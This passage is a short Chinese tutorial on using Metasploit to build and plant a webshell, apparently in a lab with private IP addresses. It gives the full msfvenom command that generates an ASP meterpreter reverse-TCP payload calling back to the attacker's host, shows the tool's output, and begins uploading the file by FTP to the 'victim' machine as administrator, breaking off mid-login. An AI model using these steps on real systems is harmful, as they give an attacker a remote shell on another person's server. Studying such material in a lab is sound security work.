Metasploit之生成webshell及应用
准备工具
1、kali 系统 IP 10.10.10.131
2、受害者机子 IP 10.10.10.130
3、使用工具 Metasploit
步骤:
1、在msf生成asp脚本木马
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
上传shell.asp到受害者机子
root@kali:~# ftp
ftp> open 10.10.10.130
Connected to 10.10.10.130.
220 Microsoft FTP Service
Name (10.10.10.130:root): administrator
331&nb